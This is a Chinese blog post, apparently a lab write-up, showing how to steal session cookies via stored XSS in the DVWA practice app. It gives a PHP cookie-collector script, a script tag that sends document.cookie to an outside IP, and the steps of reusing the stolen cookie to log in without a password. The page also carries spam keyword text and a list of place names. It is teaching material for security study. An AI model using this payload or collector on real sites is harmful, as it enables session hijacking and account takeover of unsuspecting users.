91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

存儲型xss盜取cookie實驗

發布時間:2020-06-06 15:59:45 來源:網絡 閱讀:5794 作者:天道酬勤VIP 欄目:安全技術

聲明:僅供交流使用,嚴禁違法犯罪,否則后果自負

1,準備接收cookie的環境:

    

ip為172.24.10.105

代碼為:保存為 getCookie.php

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
echo "***成功";
?>


2,在實驗環境插入js代碼:

<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>


通過審查元素把限制取消,然后插入js代碼

存儲型xss盜取cookie實驗

存儲型xss盜取cookie實驗

然后重新訪問這個頁面發現進行了跳轉

存儲型xss盜取cookie實驗

并在接收cookie的平臺看到了cookie

存儲型xss盜取cookie實驗



換一個瀏覽器設置cookie



存儲型xss盜取cookie實驗



直接訪問:

http://127.0.0.1/DVWA/

無需密碼登錄成功

存儲型xss盜取cookie實驗






歡迎關注微信公眾號

存儲型xss盜取cookie實驗

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

门源| 湄潭县| 巴塘县| 崇文区| 尚志市| 东阿县| 石门县| 阿拉善右旗| 高邑县| 凤冈县| 长岭县| 大城县| 安阳市| 开鲁县| 电白县| 收藏| 晋城| 镇江市| 宜昌市| 安乡县| 天峨县| 习水县| 红安县| 济阳县| 象州县| 淮滨县| 舞阳县| 即墨市| 体育| 辰溪县| 枝江市| 房产| 贵州省| 南通市| 苏尼特右旗| 磐石市| 比如县| 连城县| 工布江达县| 广宁县| 中卫市|